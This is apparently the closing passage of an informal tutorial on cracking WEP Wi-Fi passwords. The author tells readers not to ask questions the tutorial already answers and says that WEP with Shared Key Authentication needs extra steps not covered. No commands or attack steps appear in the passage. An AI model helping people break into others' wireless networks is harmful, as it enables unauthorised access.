    HOWEVER, I WILL NOT ANSWER ANYONE THAT IS TOO LAZY TO READ THE WHOLE TUT AND JUST ASKS ME SOME QUESTION THAT I CLEARLY ANSWERED. No one wants to hold your hand through this...read the tut and go experiment until you get it right.

    There are rare occasions where someone will use WEP encryption with SKA as well. (Shared Key Authentication) If this is the case, additional steps are needed to associate with the router and therefore, the steps I lined out here will not work. I've only seen this once or twice, though, so you probably won't run into it. If I get motivated, I may throw up a tut on how to crack this in the future.
    Hacking WEP wifi passwords